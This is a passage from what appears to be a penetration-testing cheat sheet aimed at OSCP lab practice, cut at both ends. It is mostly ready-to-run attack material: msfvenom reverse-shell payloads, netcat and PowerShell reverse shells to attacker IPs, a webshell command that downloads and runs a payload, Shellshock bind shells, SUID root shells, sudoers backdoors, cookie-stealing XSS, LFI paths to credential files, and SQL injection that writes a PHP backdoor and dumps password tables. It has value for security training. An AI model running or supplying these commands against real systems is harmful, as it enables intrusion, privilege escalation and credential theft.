Reverse Shell [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell) - PHP powered web browser Shell b374k with file upload etc. [https://github.com/b374k/b374k](https://github.com/b374k/b374k) - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 - Web Backdoors from Fuzzdb https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors - Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/ *Linux* `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf` *Windows* `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe` *Mac* `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho` **Web Payloads** *PHP* `msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php` OR `msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php` Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage: `cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php` *ASP* `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp` *JSP* `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp` *WAR* `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war` **Scripting Payloads** *Python* `msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py` *Bash* `msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh` *Perl* `msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl` **Shellcode** For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. *Linux Based Shellcode* `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` *Windows Based Shellcode* `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` *Mac Based Shellcode* `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` **Handlers** Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ - SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/ use auxiliary/scanner/ssh/ssh_login use post/multi/manage/shell_to_meterpreter - SBD.exe sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. sbd.exe (part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat alternative. - Shellshock - Testing for shell shock with NMap `root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip` - git clone https://github.com/nccgroup/shocker `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose` - Shell Shock SSH Forced Command Check for forced command by enabling all debug output with ssh ssh -vvv ssh -i noob noob@$ip '() { :;}; /bin/bash' - cat file (view file contents) echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80 - Shell Shock run bind shell echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80 File Transfers ============================================================================================================ - Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target. - Simple Local Web Servers - Run a basic http server, great for serving up shells etc python -m SimpleHTTPServer 80 - Run a basic Python3 http server, great for serving up shells etc python3 -m http.server - Run a ruby webrick basic http server ruby -rwebrick -e "WEBrick::HTTPServer.new (:Port => 80, :DocumentRoot => Dir.pwd).start" - Run a basic PHP http server php -S $ip:80 - Creating a wget VB Script on Windows: [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt) - Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line): echo Set args = Wscript.Arguments >> webdl.vbs timeout 1 echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs timeout 1 echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs timeout 1 echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs timeout 1 echo xHttp.Open "GET", Url, False >> webdl.vbs timeout 1 echo xHttp.Send >> webdl.vbs timeout 1 echo with bStrm >> webdl.vbs timeout 1 echo .type = 1 ' >> webdl.vbs timeout 1 echo .open >> webdl.vbs timeout 1 echo .write xHttp.responseBody >> webdl.vbs timeout 1 echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs timeout 1 echo end with >> webdl.vbs timeout 1 echo The file can be run using the following syntax: `C:\temp\cscript.exe webdl.vbs` - Mounting File Shares - Mount NFS share to /mnt/nfs mount $ip:/vol/share /mnt/nfs - HTTP Put nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php - Uploading Files ------------------------------------------------------------------------------------------------------------- - SCP scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2 scp localfile username@$ip:~/Folder/ scp Linux_Exploit_Suggester.pl [email protected]:~ - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor `davtest -move -sendbd auto -url http://$ip` https://github.com/cldrn/davtest You can also upload a file using the PUT method with the curl command: `curl -T 'leetshellz.txt' 'http://$ip'` And rename it to an executable file using the MOVE method with the curl command: `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'` - Upload shell using limited php shell cmd use the webshell to download and execute the meterpreter \[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php \[curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php - TFTP mkdir /tftp atftpd --daemon --port 69 /tftp cp /usr/share/windows-binaries/nc.exe /tftp/ EX. FROM WINDOWS HOST: C:\\Users\\Offsec>tftp -i $ip get nc.exe - FTP apt-get update && apt-get install pure-ftpd \#!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd offsec -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart - Packing Files ------------------------------------------------------------------------------------------------------------- - Ultimate Packer for eXecutables upx -9 nc.exe - exe2bat - Converts EXE to a text file that can be copied and pasted locate exe2bat wine exe2bat.exe nc.exe nc.txt - Veil - Evasion Framework - https://github.com/Veil-Framework/Veil-Evasion apt-get -y install git git clone https://github.com/Veil-Framework/Veil-Evasion.git cd Veil-Evasion/ cd setup setup.sh -c Privilege Escalation ================================================================================================================== *Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.* - Linux Privilege Escalation ------------------------------------------------------------------------------------------------------------------------ - Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration: [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - Try the obvious - Maybe the user is root or can sudo to root: `id` `sudo su` - Here are the commands I have learned to use to perform linux enumeration and privledge escalation: What users can login to this box (Do they use thier username as thier password)?: `grep -vE "nologin|false" /etc/passwd` What kernel version are we using? Do we have any kernel exploits for this version? `uname -a` `searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"` What applications have active connections?: `netstat -tulpn` What services are running as root?: `ps aux | grep root` What files run as root / SUID / GUID?: find / -perm +2000 -user root -type f -print find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null What folders are world writeable?: find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders find / -perm -o x -type d 2>/dev/null # world-executable folders find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders - There are a few scripts that can automate the linux enumeration process: - Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course. - LinuxPrivChecker.py - My favorite automated linux priv enumeration checker - [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py) - LinEnum - (Recently Updated) [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum) - linux-exploit-suggester (Recently Updated) [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester) - Highon.coffee Linux Local Enum - Great enumeration script! `wget https://highon.coffee/downloads/linux-local-enum.sh` - Linux Privilege Exploit Suggester (Old has not been updated in years) [https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester) - Linux post exploitation enumeration and exploit checking tools [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp) Handy Kernel Exploits - CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/) wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814 $ gcc i-can-haz-modharden.c -o i-can-haz-modharden $ ./i-can-haz-modharden [+] launching root shell! # id uid=0(root) gid=0(root) - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/) - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/) Linux CVE 2012-0056 wget -O exploit.c http://www.exploit-db.com/download/18411 gcc -o mempodipper exploit.c ./mempodipper - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 [https://dirtycow.ninja/](https://dirtycow.ninja/) First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016 - Run a command as a user other than root sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf - Add a user or change a password /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor echo thePassword | passwd haxzor --stdin - Local Privilege Escalation Exploit in Linux - **SUID** (**S**et owner **U**ser **ID** up on execution) Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required. below are some quick copy and paste examples for various shells: SUID C Shell for /bin/bash int main(void){ setresuid(0, 0, 0); system("/bin/bash"); } SUID C Shell for /bin/sh int main(void){ setresuid(0, 0, 0); system("/bin/sh"); } Building the SUID Shell binary gcc -o suid suid.c For 32 bit: gcc -m32 -o suid suid.c - Create and compile an SUID from a limited shell (no file transfer) echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c gcc privsc.c -o privsc - Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement: `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update` - You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on port 4444. set PATH="/tmp:/usr/local/bin:/usr/bin:/bin" echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh chmod +x ssh - SearchSploit searchsploit –uncsearchsploit apache 2.2 searchsploit "Linux Kernel" searchsploit linux 2.6 | grep -i ubuntu | grep local searchsploit slmail - Kernel Exploit Suggestions for Kernel Version 3.0.0 `./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0` - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!*** [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/) - Collect root password `cat /etc/shadow |grep root` - Find and display the proof.txt or flag.txt - LOOT! cat `find / -name proof.txt -print` - Windows Privilege Escalation -------------------------------------------------------------------------------------------------------------------------- - Windows Privilege Escalation resource http://www.fuzzysecurity.com/tutorials/16.html - Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/ - Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group: `whoami` `net user "%username%"` - Try the getsystem command using meterpreter - rarely works but is worth a try. `meterpreter > getsystem` - No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial and windows_privesc_check.py). Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report: @echo --------- BASIC WINDOWS RECON --------- > report.txt timeout 1 net config Workstation >> report.txt timeout 1 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt timeout 1 hostname >> report.txt timeout 1 net users >> report.txt timeout 1 ipconfig /all >> report.txt timeout 1 route print >> report.txt timeout 1 arp -A >> report.txt timeout 1 netstat -ano >> report.txt timeout 1 netsh firewall show state >> report.txt timeout 1 netsh firewall show config >> report.txt timeout 1 schtasks /query /fo LIST /v >> report.txt timeout 1 tasklist /SVC >> report.txt timeout 1 net start >> report.txt timeout 1 DRIVERQUERY >> report.txt timeout 1 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt timeout 1 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt timeout 1 dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt timeout 1 findstr /si password *.xml *.ini *.txt >> report.txt timeout 1 reg query HKLM /f password /t REG_SZ /s >> report.txt timeout 1 reg query HKCU /f password /t REG_SZ /s >> report.txt timeout 1 dir "C:\" timeout 1 dir "C:\Program Files\" >> report.txt timeout 1 dir "C:\Program Files (x86)\" timeout 1 dir "C:\Users\" timeout 1 dir "C:\Users\Public\" timeout 1 echo REPORT COMPLETE! - Windows Server 2003 and IIS 6.0 WEBDAV Exploiting http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt cadavar http://$ip dav:/> put aspshell.txt Uploading aspshell.txt to `/aspshell.txt': Progress: [=============================>] 100.0% of 38468 bytes succeeded. dav:/> copy aspshell.txt aspshell3.asp;.txt Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded. dav:/> exit msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 1.2.3.4 msf exploit(handler) > set LPORT 80 msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j curl http://$ip/aspshell3.asp;.txt [*] Started reverse TCP handler on 1.2.3.4:443 [*] Starting the payload handler... [*] Sending stage (957487 bytes) to 1.2.3.5 [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700 - Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server. pip install pyinstaller wget -O exploit.py http://www.exploit-db.com/download/31853 python pyinstaller.py --onefile exploit.py - Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: https://www.exploit-db.com/exploits/6705/ https://github.com/Re4son/Churrasco c:\Inetpub>churrasco churrasco /churrasco/-->Usage: Churrasco.exe [-d] "command to run" c:\Inetpub>churrasco -d "net user /add <username> <password>" c:\Inetpub>churrasco -d "net localgroup administrators <username> /add" c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD" - Windows MS11-080 - http://www.exploit-db.com/exploits/18176/ python pyinstaller.py --onefile ms11-080.py mx11-080.exe -O XP - Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell: MS16-032 https://www.exploit-db.com/exploits/39719/ `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"` - Powershell Priv Escalation Tools https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc - Windows Run As - Switching users in linux is trival with the `SU` command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows. - Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system). C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com - Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe: C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" Enter the password for Test: Attempting to start nc.exe as user "COMPUTERNAME\Test" ... - PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password. $username = '<username here>' $password = '<password here>' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public Next run this script using powershell.exe: `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"` - Windows Service Configuration Viewer - Check for misconfigurations in services that can lead to privilege escalation. You can replace the executable with your own and have windows execute whatever code you want as the privileged user. icacls scsiaccess.exe scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) Everyone:(I)(F) - Compile a custom add user command in windows using C ``` root@kali:~# cat useradd.c #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main () { int i; i=system ("net localgroup administrators low /add"); return 0; } ``` `i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c` - Group Policy Preferences (GPP) A common useful misconfiguration found in modern domain environments is unprotected Windows GPP settings files - map the Domain controller SYSVOL share `net use z:\\dc01\SYSVOL` - Find the GPP file: Groups.xml `dir /s Groups.xml` - Review the contents for passwords `type Groups.xml` - Decrypt using GPP Decrypt `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB` - Find and display the proof.txt or flag.txt - get the loot! `#meterpreter > run post/windows/gather/win_privs` `cd\ & dir /b /s proof.txt` `type c:\pathto\proof.txt` Client, Web and Password Attacks ============================================================================================================================== - <span id="_pcjm0n4oppqx" class="anchor"><span id="_Toc480741817" class="anchor"></span></span>Client Attacks ------------------------------------------------------------------------------------------------------------ - MS12-037- Internet Explorer 8 Fixed Col Span ID wget -O exploit.html <http://www.exploit-db.com/download/24017> service apache2 start - JAVA Signed Jar client side attack echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://$ip:80/evil.exe"></applet>' > /var/www/html/java.html User must hit run on the popup that occurs. - Linux Client Shells [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/) - Setting up the Client Side Exploit - Swapping Out the Shellcode - Injecting a Backdoor Shell into Plink.exe backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip -P 4444 -s reverse\_shell\_tcp - <span id="_n6fr3j21cp1m" class="anchor"><span id="_Toc480741818" class="anchor"></span></span>Web Attacks --------------------------------------------------------------------------------------------------------- - Web Shag Web Application Vulnerability Assessment Platform webshag-gui - Web Shells [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells) `ls -l /usr/share/webshells/` - Generate a PHP backdoor (generate) protected with the given password (s3cr3t) weevely generate s3cr3t weevely http://$ip/weevely.php s3cr3t - Java Signed Applet Attack - HTTP / HTTPS Webserver Enumeration - OWASP Dirbuster - nikto -h $ip - Essential Iceweasel Add-ons Cookies Manager https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/ Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ - Cross Site Scripting (XSS) significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more - Browser Redirection and IFRAME Injection ```html <iframe SRC="http://$ip/report" height = "0" width="0"></iframe> ``` - Stealing Cookies and Session Information ```javascript <javascript> new image().src="http://$ip/bogus.php?output="+document.cookie; </script> ``` nc -nlvp 80 - File Inclusion Vulnerabilities ----------------------------------------------------------------------------------------------------------------------------- - Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code. - fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI): [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap) - Gaining a shell from phpinfo() fimap + phpinfo() Exploit - If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster. - For Local File Inclusions look for the include() function in PHP code. ```php include("lang/".$_COOKIE['lang']); include($_GET['page'].".php"); ``` - LFI - Encode and Decode a file using base64 ```bash curl -s \ "http://$ip/?page=php://filter/convert.base64-encode/resource=index" \ | grep -e '\[^\\ \]\\{40,\\}' | base64 -d ``` - LFI - Download file with base 64 encoding [*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank) - LFI Linux Files: /etc/issue /proc/version /etc/profile /etc/passwd /etc/passwd /etc/shadow /root/.bash\_history /var/log/dmessage /var/mail/root /var/spool/cron/crontabs/root - LFI Windows Files: %SYSTEMROOT%\\repair\\system %SYSTEMROOT%\\repair\\SAM %SYSTEMROOT%\\repair\\SAM %WINDIR%\\win.ini %SYSTEMDRIVE%\\boot.ini %WINDIR%\\Panther\\sysprep.inf %WINDIR%\\system32\\config\\AppEvent.Evt - LFI OSX Files: /etc/fstab /etc/master.passwd /etc/resolv.conf /etc/sudoers /etc/sysctl.conf - LFI - Download passwords file [*http://$ip/index.php?page=/etc/passwd*](about:blank) [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank) - LFI - Download passwords file with filter evasion [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank) - Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00 - Contaminating Log Files `<?php echo shell_exec($_GET['cmd']);?>` - For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on" `include($_REQUEST["file"].".php");` - Remote File Inclusion `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt ` `<?php echo shell\_exec("ipconfig");?>` - <span id="_mgu7e3u7svak" class="anchor"><span id="_Toc480741820" class="anchor"></span></span>Database Vulnerabilities ---------------------------------------------------------------------------------------------------------------------- - Playing with SQL Syntax A great tool I have found for playing with SQL Syntax for a variety of database types (MSSQL Server, MySql, PostGreSql, Oracle) is SQL Fiddle: http://sqlfiddle.com Another site is rextester.com: http://rextester.com/l/mysql_online_compiler - Detecting SQL Injection Vulnerabilities. Most modern automated scanner tools use time delay techniques to detect SQL injection vulnerabilities. This method can tell you if a SQL injection vulnerability is present even if it is a "blind" sql injection vulnerabilit that does not provide any data back. You know your SQL injection is working when the server takes a LOooooong time to respond. I have added a line comment at the end of each injection statement just in case there is additional SQL code after the injection point. - **MSSQL Server SQL Injection Time Delay Detection:** Add a 30 second delay to a MSSQL Server Query - *Original Query* `SELECT * FROM products WHERE name='Test';` - *Injection Value* `'; WAITFOR DELAY '00:00:30'; --` - *Resulting Query* `SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --` - **MySQL Injection Time Delay Detection:** Add a 30 second delay to a MySQL Query - *Original Query* `SELECT * FROM products WHERE name='Test';` - *Injection Value* `'-SLEEP(30); #` - *Resulting Query* `SELECT * FROM products WHERE name='Test'-SLEEP(30); #` - **PostGreSQL Injection Time Delay Detection:** Add a 30 second delay to an PostGreSQL Query - *Original Query* `SELECT * FROM products WHERE name='Test';` - *Injection Value* `'; SELECT pg_sleep(30); --` - *Resulting Query* `SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --` - Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password mysql -u root -p -h $ip use "Users" show tables; select \* from users; - Authentication Bypass name='wronguser' or 1=1; name='wronguser' or 1=1 LIMIT 1; - Enumerating the Database `http://192.168.11.35/comment.php?id=738)'` Verbose error message? `http://$ip/comment.php?id=738 order by 1` `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6 ` Determine MySQL Version: `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6 ` Current user being used for the database connection: `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6 ` Enumerate database tables and column structures `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables ` Target the users table in the database `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users' ` Extract the name and password `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users ` Create a backdoor `http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'` - **SQLMap Examples** - Crawl the links `sqlmap -u http://$ip --crawl=1` `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3` - SQLMap Search for databases against a suspected GET SQL Injection `sqlmap –u http://$ip/blog/index.php?search –dbs` - SQLMap dump tables from database oscommerce at GET SQL injection `sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps ` - SQLMap GET Parameter command `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5 ` - SQLMap Post Username parameter `sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all` - SQL Map OS Shell `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell ` `sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell` - Automated sqlmap scan `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"` - Targeted sqlmap scan `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump` - Scan url for union + error based injection with mysql backend and use a random user agent + database dump `sqlmap -o -u http://$ip/index.php --forms --dbs ` `sqlmap -o -u "http://$ip/form/" --forms` - Sqlmap check form for injection `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump` - Enumerate databases `sqlmap --dbms=mysql -u "$URL" --dbs` - Enumerate tables from a specific database `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" 